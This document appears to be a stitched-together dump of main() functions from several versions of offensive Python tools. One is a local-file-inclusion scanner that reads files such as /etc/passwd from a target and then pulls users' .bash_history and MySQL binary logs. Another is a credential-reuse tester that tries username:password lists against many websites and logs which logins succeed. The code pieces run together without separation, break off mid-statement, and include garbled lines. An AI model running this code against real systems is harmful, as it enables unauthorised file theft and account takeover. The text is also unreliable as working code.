def main(): """ Initializes and executes the program """ global args kb.files = [] kb.found = False kb.print_lock = threading.Lock() kb.value_lock = threading.Lock() check_revision() print(BANNER) args = parse_args() if args.update: update() exit() cases = get_cases(args) if not args.list_file else load_list(args.list_file) if args.list: args.list = args.list.lower() _ = ("category", "software", "os") if args.list not in _: print("[!] Valid values for option '--list' are: %s" % ", ".join(_)) exit() print("[i] Listing available filters for usage with option '--%s':\n" % args.list) try: for _ in set([_[args.list] for _ in cases]): print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _) except KeyError: pass finally: exit() if args.ignore_proxy: _ = ProxyHandler({}) opener = build_opener(_) install_opener(opener) elif args.proxy: from thirdparty.socks import socks match = re.search(r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)", args.proxy, re.I) if match: if match.group("type").upper() == PROXY_TYPE.SOCKS4: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True) elif match.group("type").upper() == PROXY_TYPE.SOCKS5: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True) elif match.group("type").upper() in (PROXY_TYPE.HTTP, PROXY_TYPE.HTTPS): _ = ProxyHandler({match.group("type"): args.proxy}) opener = build_opener(_) install_opener(opener) if args.random_agent: with open(USER_AGENTS_FILE, 'r') as f: args.user_agent = random.sample(f.readlines(), 1)[0] kb.parsed_target_url = urlsplit(args.url) kb.request_params = args.data if args.data else kb.parsed_target_url.query if not args.param: match = re.match("(?P<param>[^=&]+)={1}(?P<value>[^=&]+)", kb.request_params) if match: args.param = match.group("param") else: print("[!] No usable GET/POST parameters found.") exit() if args.os: kb.restrict_os = args.os print("[i] Starting scan at: %s\n" % time.strftime("%X")) print("[i] Checking original response...") request_args = prepare_request(None) request_args["url"] = args.url if args.data: request_args["data"] = args.data kb.original_response = get_page(**request_args) print("[i] Checking invalid response...") request_args = prepare_request(INVALID_FILENAME) kb.invalid_response = get_page(**request_args) print("[i] Done!") print("[i] Searching for files...") if args.threads > 1: print("[i] Starting %d threads" % args.threads) threads = [] for i in xrange(args.threads): thread = threading.Thread(target=try_cases, args=([cases[_] for _ in xrange(i, len(cases), args.threads)],)) thread.daemon = True thread.start() threads.append(thread) alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True time.sleep(0.1) if not kb.found: print("[i] No files found!") elif args.verbose: print("\n[i] Files found:") for _ in kb.files: print("[o] %s" % _) print(" \n[i] File search complete.") print("\n[i] Finishing scan at: %s\n" % time.strftime("%X"))
if not _: errMsg = "Proxy authentication credentials " errMsg += "value must be in format username:password" raise PocsuiteSyntaxException(errMsg) else: username = _.group(1) password = _.group(2) if scheme == PROXY_TYPE.SOCKS4: proxyMode = socks.PROXY_TYPE_SOCKS4 elif scheme == PROXY_TYPE.SOCKS5: proxyMode = socks.PROXY_TYPE_SOCKS5 else: proxyMode = socks.PROXY_TYPE_HTTP socks.setdefaultproxy(proxyMode, hostname, port, username=username, password=password) socket.socket = socks.socksocket def _setHTTPTimeout(): """ Set the HTTP timeout """ if conf.timeout: infoMsg = "setting the HTTP timeout" logger.log(CUSTOM_LOGGING.SYSINFO, infoMsg) conf.timeout = float(conf.timeout) if conf.timeout < 3.0:
def main(): """ Initializes and executes the program """ global args kb.files = [] kb.found = False kb.print_lock = threading.Lock() kb.value_lock = threading.Lock() kb.versioned_locations = {} check_revision() print(BANNER) args = parse_args() if args.update: update() exit() with open("versions.ini") as f: section = None for line in f.xreadlines(): line = line.strip() if re.match(r"\[.+\]", line): section = line.strip("[]") elif line: if section not in kb.versioned_locations: kb.versioned_locations[section] = [] kb.versioned_locations[section].append(line) cases = get_cases(args) if not args.list_file else load_list( args.list_file) if not cases: print("[!] No available test cases with the specified attributes.\n" "[!] Please verify available options with --list.") exit() if args.list: args.list = args.list.lower() _ = ("category", "software", "os") if args.list not in _: print("[!] Valid values for option '--list' are: %s" % ", ".join(_)) exit() print("[i] Listing available filters for usage with option '--%s':\n" % args.list) try: for _ in set([_[args.list] for _ in cases]): print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _) except KeyError: pass finally: exit() if args.ignore_proxy: _ = ProxyHandler({}) opener = build_opener(_) install_opener(opener) elif args.proxy: match = re.search( r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)", args.proxy, re.I) if match: if match.group("type").upper() in (PROXY_TYPE.HTTP, PROXY_TYPE.HTTPS): _ = ProxyHandler({match.group("type"): args.proxy}) opener = build_opener(_) install_opener(opener) else: from thirdparty.socks import socks if match.group("type").upper() == PROXY_TYPE.SOCKS4: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True) elif match.group("type").upper() == PROXY_TYPE.SOCKS5: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True) else: print( "[!] Wrong proxy format (proper example: \"http://127.0.0.1:8080\")." ) exit() if args.random_agent: with open(USER_AGENTS_FILE, 'r') as f: args.user_agent = random.sample(f.readlines(), 1)[0] kb.parsed_target_url = urlsplit(args.url) kb.request_params = args.data if args.data else kb.parsed_target_url.query if not args.param: match = re.match("(?P<param>[^=&]+)=(?P<value>[^=&]+)", kb.request_params) if match: args.param = match.group("param") else: found = False for match in re.finditer("(?P<param>[^=&]+)=(?P<value>[^=&]*)", kb.request_params): found = True print("[x] Parameter with empty value found ('%s')." % match.group("param")) if found: print( "[!] Please always use non-empty (valid) parameter values." ) print("[!] No usable GET/POST parameters found.") exit() if args.os: kb.restrict_os = args.os print("[i] Starting scan at: %s\n" % time.strftime("%X")) print("[i] Checking original response...") request_args = prepare_request(None) request_args["url"] = args.url if args.data: request_args["data"] = args.data kb.original_response = get_page(**request_args) if not kb.original_response: print("[!] Something seems to be wrong with connection settings.") if not args.verbose: print("[i] Please rerun with switch '-v'.") exit() print("[i] Checking invalid response...") request_args = prepare_request( "%s%s%s" % (args.prefix, INVALID_FILENAME, args.postfix)) kb.invalid_response = get_page(**request_args) print("[i] Done!") print("[i] Searching for files...") if args.threads > 1: print("[i] Starting %d threads." % args.threads) threads = [] for i in xrange(args.threads): thread = threading.Thread( target=try_cases, args=([cases[_] for _ in xrange(i, len(cases), args.threads)], )) thread.daemon = True thread.start() threads.append(thread) alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True time.sleep(0.1) if not kb.found: print("[i] No files found!") elif args.verbose: print("\n[i] Files found:") for _ in kb.files: print("[o] %s" % _) print(" \n[i] File search complete.") print("\n[i] Finishing scan at: %s\n" % time.strftime("%X"))
def main(): """ Initializes and executes the program """ use_revision() print(BANNER) args = parse_args() found = False kb = {} files = [] if args.update: update() exit() cases = get_cases(args) if args.list: print("[i] Listing available filters for usage with option '--%s':\n" % args.list) for _ in set([_[args.list] for _ in cases]): print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _) exit() if args.ignore_proxy: _ = ProxyHandler({}) opener = build_opener(_) install_opener(opener) elif args.proxy: from thirdparty.socks import socks match = re.search( r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)", args.proxy, re.I) if match: if match.group("type").lower() == "socks4": socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True) elif match.group("type").lower() == "socks5": socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True) elif match.group("type").lower() in ("http", "https"): _ = ProxyHandler({match.group("type"): args.proxy}) opener = build_opener(_) install_opener(opener) if args.random_agent: with open(USER_AGENTS_FILE, 'r') as f: args.user_agent = random.sample(f.readlines(), 1)[0] parsed_url = urlsplit(args.url) request_params = args.data if args.data else parsed_url.query if not args.param: match = re.match("(?P<param>[^=&]+)={1}(?P<value>[^=&]+)", request_params) if match: args.param = match.group(1) else: print("[!] no usable GET/POST parameters found") exit() print("[i] Starting scan at: %s\n" % time.strftime("%X")) def prepare_request(payload): """ Prepares HTTP (GET or POST) request with proper payload """ _ = re.sub(r"(?P<param>%s)={1}(?P<value>[^=&]+)" % args.param, r"\1=%s" % payload, request_params) request_args = { "url": "%s://%s%s" % (parsed_url.scheme or "http", parsed_url.netloc, parsed_url.path) } if args.data: request_args["data"] = _ else: request_args["url"] += "?%s" % _ if args.header: request_args["header"] = args.header if args.cookie: request_args["cookie"] = args.cookie if args.user_agent: request_args["user_agent"] = args.user_agent request_args["verbose"] = args.verbose return request_args def clean_response(response, filepath): """ Cleans response from occurrences of filepath """ response = response.replace(filepath, "") regex = re.sub(r"[^A-Za-z0-9]", "(.|&\w+;|%[0-9A-Fa-f]{2})", filepath) return re.sub(regex, "", response, re.I) print("[i] Checking original response...") request_args = prepare_request(None) request_args["url"] = args.url if args.data: request_args["data"] = args.data original_response = get_page(**request_args) print("[i] Checking invalid response...") request_args = prepare_request(INVALID_FILENAME) invalid_response = get_page(**request_args) print("[i] Done!") print("[i] Searching for files...") def request_file(case, replace_slashes=True):
errMsg += "value must be in format username:password" raise PocsuiteSyntaxException(errMsg) else: username = _.group(1) password = _.group(2) if scheme == PROXY_TYPE.SOCKS4: proxyMode = socks.PROXY_TYPE_SOCKS4 elif scheme == PROXY_TYPE.SOCKS5: proxyMode = socks.PROXY_TYPE_SOCKS5 else: proxyMode = socks.PROXY_TYPE_HTTP socks.setdefaultproxy(proxyMode, hostname, port, username=username, password=password) socket.socket = socks.socksocket def _setHTTPTimeout(): """ Set the HTTP timeout """ if conf.timeout: infoMsg = "setting the HTTP timeout" logger.log(CUSTOM_LOGGING.SYSINFO, infoMsg) conf.timeout = float(conf.timeout)
def main(): """ Initializes and executes the program """ use_revision() print(BANNER) args = parse_args() found = False kb = {} files = [] if args.update: update() exit() cases = get_cases(args) if args.list: print("[i] Listing available filters for usage with option '--%s':\n" % args.list) for _ in set([_[args.list] for _ in cases]): print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _) exit() if args.ignore_proxy: _ = ProxyHandler({}) opener = build_opener(_) install_opener(opener) elif args.proxy: from thirdparty.socks import socks match = re.search(r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)", args.proxy, re.I) if match: if match.group("type").lower() == "socks4": socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True) elif match.group("type").lower() == "socks5": socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True) elif match.group("type").lower() in ("http", "https"): _ = ProxyHandler({match.group("type"): args.proxy}) opener = build_opener(_) install_opener(opener) if args.random_agent: with open(USER_AGENTS_FILE, 'r') as f: args.user_agent = random.sample(f.readlines(), 1)[0] parsed_url = urlsplit(args.url) request_params = args.data if args.data else parsed_url.query if not args.param: match = re.match("(?P<param>[^=&]+)={1}(?P<value>[^=&]+)", request_params) if match: args.param = match.group(1) else: print("[!] no usable GET/POST parameters found") exit() print("[i] Starting scan at: %s\n" % time.strftime("%X")) def prepare_request(payload): """ Prepares HTTP (GET or POST) request with proper payload """ _ = re.sub(r"(?P<param>%s)={1}(?P<value>[^=&]+)" % args.param, r"\1=%s" % payload, request_params) request_args = {"url": "%s://%s%s" % (parsed_url.scheme or "http", parsed_url.netloc, parsed_url.path)} if args.data: request_args["data"] = _ else: request_args["url"] += "?%s" % _ if args.header: request_args["header"] = args.header if args.cookie: request_args["cookie"] = args.cookie if args.user_agent: request_args["user_agent"] = args.user_agent request_args["verbose"] = args.verbose return request_args def clean_response(response, filepath): """ Cleans response from occurrences of filepath """ response = response.replace(filepath, "") regex = re.sub(r"[^A-Za-z0-9]", "(.|&\w+;|%[0-9A-Fa-f]{2})", filepath) return re.sub(regex, "", response, re.I) print("[i] Checking original response...") request_args = prepare_request(None) request_args["url"] = args.url if args.data: request_args["data"] = args.data original_response = get_page(**request_args) print("[i] Checking invalid response...") request_args = prepare_request(INVALID_FILENAME) invalid_response = get_page(**request_args) print("[i] Done!") print("[i] Searching for files...") def request_file(case, replace_slashes=True): """ Request file from URL """ if args.replace_slash and replace_slashes: case["location"] = case["location"].replace("/", args.replace_slash.replace("\\", "\\\\")) if kb.get("restrict_os") and kb.get("restrict_os") != case["os"]: if args.verbose: print("[*] Skipping '%s'" % case["location"]) return None if args.prefix and args.prefix[len(args.prefix) - 1] == "/": args.prefix = args.prefix[:-1] if args.verbose: print("[*] Trying '%s'" % case["location"]) request_args = prepare_request("%s%s%s" % (args.prefix, case["location"], args.postfix)) html = get_page(**request_args) if not html or args.bad_string and html.find(args.bad_string) != -1: return None matcher = difflib.SequenceMatcher(None, clean_response(html, case["location"]), clean_response(invalid_response, INVALID_FILENAME)) if matcher.quick_ratio() < HEURISTIC_RATIO: if not found: print("[i] Possible file(s) found!") print("[i] OS: %s" % case["os"]) if kb.get("restrict_os") is None: answer = ask_question("Do you want to restrict further scans to '%s'? [Y/n]" % case["os"], default='Y', automatic=args.automatic) kb["restrict_os"] = answer.upper() != 'N' and case["os"] _ = "'%s' (%s/%s/%s)" % (case["location"], case["os"], case["category"], case["type"]) _ = _.replace("%s/%s/" % (case["os"], case["os"]), "%s/" % case["os"]) print("[+] Found %s" % _) if args.verbose: files.append(_) # If --write-file is set if args.write_files: _ = os.path.join("output", parsed_url.netloc) if not os.path.exists(_): os.makedirs(_) with open(os.path.join(_, "%s.txt" % case["location"].replace(args.replace_slash if args.replace_slash else "/", "_")), "w") as f: content = html if kb.get("filter_output") is None: answer = ask_question("Do you want to filter retrieved files from original HTML page content? [Y/n]", default='Y', automatic=args.automatic) kb["filter_output"] = answer.upper() != 'N' if kb.get("filter_output"): matcher = difflib.SequenceMatcher(None, html, original_response) matching_blocks = matcher.get_matching_blocks() if matching_blocks: start = matching_blocks[0] if start[0] == start[1] == 0 and start[2] > 0: content = content[start[2]:] if len(matching_blocks) > 2: end = matching_blocks[-2] if end[2] > 0 and end[0] + end[2] == len(html) and end[1] + end[2] == len(original_response): content = content[:-end[2]] f.write(content) return html return None # Test file locations in XML file for case in cases: html = request_file(case) if html is None: continue if not found: found = True # If --skip-file-parsing is not set. if case["location"] in ("/etc/passwd", "/etc/security/passwd") and not args.skip_parsing: users = re.findall("(?P<username>[^:\n]+):(?P<password>[^:]*):(?P<uid>\d+):(?P<gid>\d*):(?P<info>[^:]*):(?P<home>[^:]+):[/a-z]*", html) if args.verbose: print("[*] Extracting home folders from '%s'" % case["location"]) for user in users: if args.verbose: print("[*] User: %s, Info: %s" % (user[0], user[4])) for _ in (".bash_config", ".bash_history", ".bash_logout", ".ksh_history", ".Xauthority"): if user[5] == "/": continue request_file({"category": "*NIX Password File", "type": "conf", "os": case["os"], "location": "%s/%s" % (user[5], _), "software": "*NIX"}) if "mysql-bin.index" in case["location"] and not args.skip_parsing: binlogs = re.findall("\\.\\\\(?P<binlog>mysql-bin\\.\\d{0,6})", html) location = case["location"].rfind("/") + 1 if args.verbose: print("[i] Extracting MySQL binary logs from '%s'" % case["location"]) for _ in binlogs: request_file({"category": "Databases", "type": "log", "os": case["os"], "location": "%s%s" % (case["location"][:location], _), "software": "MySQL"}, False) if not found: print("[i] No files found!") elif args.verbose: print("\n[i] Files found:") for _ in files: print("[o] %s" % _) print("\n[i] File search complete.") print("\n[i] Finishing scan at: %s\n" % time.strftime("%X"))
def main(): """ Initializes and executes the program. """ login_sucessful = [] login_failed = [] login_skipped = [] version = check_revision(VERSION) print("%s\n\n%s %s (%s)\n" % ( BANNER % tuple([color(_) for _ in BANNER_PASSWORDS]), NAME, version, URL)) args = parse_args() if args.update: update() exit() if args.list: sites = list_sites() for _ in sites: print("- %s" % _) exit() if not args.password and not args.load_file: args.password = getpass("%s Please enter password:"******"(?P<type>[^:]+)://(?P<address>[^:]+)" r":(?P<port>\d+)", args.proxy, re.I) if match: if match.group("type").upper() in ("HTTP", "HTTPS"): proxy_host = "%s:%s" % (match.group("address"), match.group("port")) proxy_handler = ProxyHandler({"http": proxy_host, "https": proxy_host}) else: from thirdparty.socks import socks if match.group("type").upper() == "SOCKS4": socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True) elif match.group("type").upper() == "SOCKS5": socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True) proxy_handler = None else: proxy_handler = ProxyHandler() else: proxy_handler = None opener = build_opener(HTTPHandler(), HTTPSHandler(), HTTPCookieProcessor(cookie_handler)) if proxy_handler: opener.add_handler(proxy_handler) install_opener(opener) with open(USER_AGENTS_FILE, 'r') as ua_file: args.user_agent = sample(ua_file.readlines(), 1)[0].strip() credentials = {"username": args.username, "email": args.email, "password": quote(args.password)} sites = list_sites() if args.only: sites = [site for site in sites if site in args.only] elif args.exclude: sites = [site for site in sites if site not in args.exclude] print("%s Loaded %d %s to test." % (INFO, len(sites), "site" if len(sites) == 1 else "sites")) if args.load_file: if not isfile(args.load_file): print("%s could not find the file \"%s\"" % (WARN, color(args.load_file))) exit() _ = sum(1 for line in open(args.load_file, "r")) if _ < 1: print("%s the file \"%s\" doesn't contain any valid credentials." % (WARN, color(args.load_file))) exit() print("%s Loaded %d credential%s from \"%s\".\n" % (INFO, _, "s" if _ != 1 else "", color(args.load_file))) print("%s Starting tests at: \"%s\"\n" % (INFO, color(strftime("%X"), BW))) if not exists(OUTPUT_DIR): makedirs(OUTPUT_DIR) log = logger("%s/credmap" % OUTPUT_DIR) log.open() for site in sites: _ = populate_site(site, args) if not _: continue target = Website(_, {"verbose": args.verbose}) if not target.user_agent: target.user_agent = args.user_agent def login(): """ Verify credentials for login and check if login was successful. """ if(target.username_or_email == "email" and not credentials["email"] or target.username_or_email == "username" and not credentials["username"]): if args.verbose: print("%s Skipping %s\"%s\" since " "no \"%s\" was specified.\n" % (INFO, "[%s:%s] on " % (credentials["username"] or credentials["email"], credentials["password"]) if args.load_file else "", color(target.name), color(target.username_or_email, BW))) login_skipped.append(target.name) return print("%s Testing %s\"%s\"..." % (TEST, "[%s:%s] on " % (credentials["username"] or credentials["email"], credentials["password"]) if args.load_file else "", color(target.name, BW))) cookie_handler.clear() if target.perform_login(credentials, cookie_handler): log.write(">>> %s - %s:%s\n" % (target.name, credentials["username"] or credentials["email"], credentials["password"])) login_sucessful.append("%s%s" % (target.name, " [%s:%s]" % (credentials["username"] or credentials["email"], credentials["password"]) if args.load_file else "")) else: login_failed.append(target.name) if args.load_file: with open(args.load_file, "r") as load_list: for user in load_list: user = user.rstrip().split(":", 1) if not user[0]: continue match = re.match(r"^[A-Za-z0-9._%+-]+@(?:[A-Z" r"a-z0-9-]+\.)+[A-Za-z]{2,12}$", user[0]) credentials = {"email": user[0] if match else None, "username": None if match else user[0], "password": user[1]} login() else: login() log.close() if not args.verbose: print() if len(login_sucessful) > 0 or len(login_failed) > 0: _ = "%s/%s" % (color(len(login_sucessful), BW), color(len(login_sucessful) + len(login_failed), BW)) sign = PLUS if len(login_sucessful) > (len(login_failed) + len(login_skipped)) else INFO print("%s Succesfully logged in%s." % (sign, " with %s credentials on the list." % _ if args.load_file else "to %s websites." % _),) print("%s An overall success rate of %s.\n" % (sign, color("%%%s" % (100 * len(login_sucessful) / (len(login_sucessful) + len(login_failed))), BW))) if len(login_sucessful) > 0: print("%s The provided credentials worked on the following website%s: " "%s\n" % (PLUS, "s" if len(login_sucessful) != 1 else "", ", ".join(login_sucessful))) print("%s Finished tests at: \"%s\"\n" % (INFO, color(strftime("%X"), BW)))
def main(): """ Initializes and executes the program. """ login_sucessful = [] login_failed = [] login_skipped = [] version = check_revision(VERSION) print("%s\n\n%s %s (%s)\n" % (BANNER % tuple([color(_) for _ in BANNER_PASSWORDS]), NAME, version, URL)) args = parse_args() if args.update: update() exit() sites = list_sites() if args.list: for _ in sites: print("- %s" % _) exit() if not args.password and not args.load_file: args.password = getpass("%s Please enter password:"******"(?P<type>[^:]+)://(?P<address>[^:]+)" r":(?P<port>\d+)", args.proxy, re.I) if match: if match.group("type").upper() in ("HTTP", "HTTPS"): proxy_host = "%s:%s" % (match.group("address"), match.group("port")) proxy_handler = ProxyHandler({ "http": proxy_host, "https": proxy_host }) else: from thirdparty.socks import socks if match.group("type").upper() == "SOCKS4": socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True) elif match.group("type").upper() == "SOCKS5": socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True) proxy_handler = None else: proxy_handler = ProxyHandler() else: proxy_handler = None opener = build_opener(HTTPHandler(), HTTPSHandler(), HTTPCookieProcessor(cookie_handler)) if proxy_handler: opener.add_handler(proxy_handler) install_opener(opener) with open(USER_AGENTS_FILE, 'r') as ua_file: args.user_agent = sample(ua_file.readlines(), 1)[0].strip() if args.only: sites = [site for site in sites if site in args.only] elif args.exclude: sites = [site for site in sites if site not in args.exclude] print("%s Loaded %d %s to test." % (INFO, len(sites), "site" if len(sites) == 1 else "sites")) if args.load_file: if not isfile(args.load_file): print("%s could not find the file \"%s\"" % (WARN, color(args.load_file))) exit() _ = sum(1 for line in open(args.load_file, "r")) if _ < 1: print("%s the file \"%s\" doesn't contain any valid credentials." % (WARN, color(args.load_file))) exit() print("%s Loaded %d credential%s from \"%s\".\n" % (INFO, _, "s" if _ != 1 else "", color(args.load_file))) print("%s Starting tests at: \"%s\"\n" % (INFO, color(strftime("%X"), BW))) if not exists(OUTPUT_DIR): makedirs(OUTPUT_DIR) log = Logger("%s/credmap" % OUTPUT_DIR) log.open() def get_targets(): """ Retrieve and yield list of sites (targets) for testing. """ for site in sites: _ = populate_site(site, args) if not _: continue target = Website(_, {"verbose": args.verbose}) if not target.user_agent: target.user_agent = args.user_agent yield target def login(): """ Verify credentials for login and check if login was successful. """ if (target.username_or_email == "email" and not credentials["email"] or target.username_or_email == "username" and not credentials["username"]): if args.verbose: print( "%s Skipping %s\"%s\" since " "no \"%s\" was specified.\n" % (INFO, "[%s:%s] on " % (credentials["username"] or credentials["email"], credentials["password"]) if args.load_file else "", color(target.name), color(target.username_or_email, BW))) login_skipped.append(target.name) return print("%s Testing %s\"%s\"..." % (TEST, "[%s:%s] on " % (credentials["username"] or credentials["email"], credentials["password"]) if args.load_file else "", color(target.name, BW))) cookie_handler.clear() if target.perform_login(credentials, cookie_handler): log.write(">>> %s - %s:%s\n" % (target.name, credentials["username"] or credentials["email"], credentials["password"])) login_sucessful.append( "%s%s" % (target.name, " [%s:%s]" % (credentials["username"] or credentials["email"], credentials["password"]) if args.load_file else "")) else: login_failed.append(target.name) if args.load_file: if args.cred_format: separators = [ re.escape(args.cred_format[1]), re.escape(args.cred_format[3]) if len(args.cred_format) > 3 else "\n" ] cred_format = re.match(r"(u|e|p)[^upe](u|e|p)(?:[^upe](u|e|p))?", args.cred_format) if not cred_format: print("%s Could not parse --format: \"%s\"" % (ERROR, color(args.cred_format, BW))) exit() cred_format = [ v.replace("e", "email").replace("u", "username").replace( "p", "password") for v in cred_format.groups() if v is not None ] with open(args.load_file, "r") as load_list: for user in load_list: if args.cred_format: match = re.match( r"([^{0}]+){0}([^{1}]+)(?:{1}([^\n]+))?".format( separators[0], separators[1]), user) credentials = dict(zip(cred_format, match.groups())) credentials["password"] = quote(credentials["password"]) if ("email" in credentials and not re.match( r"^[A-Za-z0-9._%+-]+@(?:[A-Z" r"a-z0-9-]+\.)+[A-Za-z]{2,12}$", credentials["email"])): print("%s Specified e-mail \"%s\" does not appear " "to be correct. Skipping...\n" % (WARN, color(credentials["email"], BW))) continue if "email" not in credentials: credentials["email"] = None elif "username" not in credentials: credentials["username"] = None else: user = user.rstrip().split(":", 1) if not user[0]: if args.verbose: print("%s Could not parse credentials: \"%s\"\n" % (WARN, color(user, BW))) continue match = re.match( r"^[A-Za-z0-9._%+-]+@(?:[A-Z" r"a-z0-9-]+\.)+[A-Za-z]{2,12}$", user[0]) credentials = { "email": user[0] if match else None, "username": None if match else user[0], "password": quote(user[1]) } for target in get_targets(): login() else: credentials = { "username": args.username, "email": args.email, "password": quote(args.password) } for target in get_targets(): login() log.close() if not args.verbose: print() if len(login_sucessful) > 0 or len(login_failed) > 0: _ = "%s/%s" % (color(len(login_sucessful), BW), color(len(login_sucessful) + len(login_failed), BW)) sign = PLUS if len(login_sucessful) > (len(login_failed) + len(login_skipped)) else INFO print( "%s Succesfully logged in%s." % (sign, " with %s credentials on the list." % _ if args.load_file else "to %s websites." % _), ) print("%s An overall success rate of %s.\n" % (sign, color( "%%%s" % (100 * len(login_sucessful) / (len(login_sucessful) + len(login_failed))), BW))) if len(login_sucessful) > 0: print("%s The provided credentials worked on the following website%s: " "%s\n" % (PLUS, "s" if len(login_sucessful) != 1 else "", ", ".join(login_sucessful))) print("%s Finished tests at: \"%s\"\n" % (INFO, color(strftime("%X"), BW)))
def main(): """ Initializes and executes the program """ login_sucessful = [] login_failed = [] version = check_revision(VERSION) print("%s\n\n%s %s (%s)\n" % ( BANNER % tuple([color(_) for _ in BANNER_PASSWORDS]), NAME, version, URL)) args = parse_args() if args.update: update() exit() if args.list: sites = list_sites() for _ in sites: print("- %s" % _) exit() if not args.password: args.password = getpass("%s Please enter password:"******"") if args.ignore_proxy: proxy_handler = ProxyHandler({}) elif args.proxy: match = re.search(r"(?P<type>[^:]+)://(?P<address>[^:]+)" r":(?P<port>\d+)", args.proxy, re.I) if match: if match.group("type").upper() in ("HTTP", "HTTPS"): proxy_host = "%s:%s" % (match.group("address"), match.group("port")) proxy_handler = ProxyHandler({"http": proxy_host, "https": proxy_host}) else: from thirdparty.socks import socks if match.group("type").upper() == "SOCKS4": socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True) elif match.group("type").upper() == "SOCKS5": socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True) proxy_handler = None else: proxy_handler = ProxyHandler() else: proxy_handler = None opener = build_opener(HTTPHandler(), HTTPSHandler(), HTTPCookieProcessor(cookie_handler)) if proxy_handler: opener.add_handler(proxy_handler) install_opener(opener) with open(USER_AGENTS_FILE, 'r') as ua_file: args.user_agent = sample(ua_file.readlines(), 1)[0].strip() credentials = {"username": args.username, "email": args.email, "password": args.password} sites = list_sites() if args.only: sites = [site for site in sites if site in args.only] elif args.exclude: sites = [site for site in sites if site not in args.exclude] print("%s Loaded %d %s to test." % (INFO, len(sites), "site" if len(sites) == 1 else "sites")) print("%s Starting tests at: \"%s\"\n" % (INFO, color(strftime("%X"), BW))) for site in sites: _ = populate_site(site, args) if not _: continue target = Website(_, {"verbose": args.verbose}) if (target.username_or_email == "email" and not args.email or target.username_or_email == "username" and not args.username): if args.verbose: print("%s Skipping \"%s\" since no \"%s\" was specified.\n" % (INFO, color(target.name), color(target.username_or_email))) continue print("%s Testing \"%s\"" % (TEST, color(target.name, BW))) if not target.user_agent: target.user_agent = args.user_agent if target.perform_login(credentials, cookie_handler): login_sucessful.append(target.name) else: login_failed.append(target.name) if not args.verbose: print() if len(login_sucessful) > 0 or len(login_failed) > 0: print("%s Succesfully logged into %s/%s websites." % (INFO, color(len(login_sucessful), BW), color(len(login_sucessful) + len(login_failed), BW))) print("%s An overall success rate of %s.\n" % (INFO, color("%%%s" % (100 * len(login_sucessful) / len(sites)), BW))) if len(login_sucessful) > 0: print("%s The provided credentials worked on the following website%s: " "%s\n" % (PLUS, "s" if len(login_sucessful) != 1 else "", ", ".join(login_sucessful))) print("%s Finished tests at: \"%s\"\n" % (INFO, color(strftime("%X"), BW)))
def main(): """ Initializes and executes the program """ global args kb.files = [] kb.found = False kb.print_lock = threading.Lock() kb.value_lock = threading.Lock() kb.versioned_locations = {} check_revision() print(BANNER) args = parse_args() if args.update: update() exit() with open("versions.ini") as f: section = None for line in f.xreadlines(): line = line.strip() if re.match(r"\[.+\]", line): section = line.strip("[]") elif line: if section not in kb.versioned_locations: kb.versioned_locations[section] = [] kb.versioned_locations[section].append(line) cases = get_cases(args) if not args.list_file else load_list(args.list_file) if not cases: print("[!] No available test cases with the specified attributes.\n" "[!] Please verify available options with --list.") exit() if args.list: args.list = args.list.lower() _ = ("category", "software", "os") if args.list not in _: print("[!] Valid values for option '--list' are: %s" % ", ".join(_)) exit() print("[i] Listing available filters for usage with option '--%s':\n" % args.list) try: for _ in set([_[args.list] for _ in cases]): print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _) except KeyError: pass finally: exit() if args.ignore_proxy: _ = ProxyHandler({}) opener = build_opener(_) install_opener(opener) elif args.proxy: match = re.search(r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)", args.proxy, re.I) if match: if match.group("type").upper() in (PROXY_TYPE.HTTP, PROXY_TYPE.HTTPS): _ = ProxyHandler({match.group("type"): args.proxy}) opener = build_opener(_) install_opener(opener) else: from thirdparty.socks import socks if match.group("type").upper() == PROXY_TYPE.SOCKS4: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True) elif match.group("type").upper() == PROXY_TYPE.SOCKS5: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True) else: print("[!] Wrong proxy format (proper example: \"http://127.0.0.1:8080\").") exit() if args.random_agent: with open(USER_AGENTS_FILE, 'r') as f: args.user_agent = random.sample(f.readlines(), 1)[0] kb.parsed_target_url = urlsplit(args.url) kb.request_params = args.data if args.data else kb.parsed_target_url.query if not args.param: match = re.match("(?P<param>[^=&]+)=(?P<value>[^=&]+)", kb.request_params) if match: args.param = match.group("param") else: found = False for match in re.finditer("(?P<param>[^=&]+)=(?P<value>[^=&]*)", kb.request_params): found = True print("[x] Parameter with empty value found ('%s')." % match.group("param")) if found: 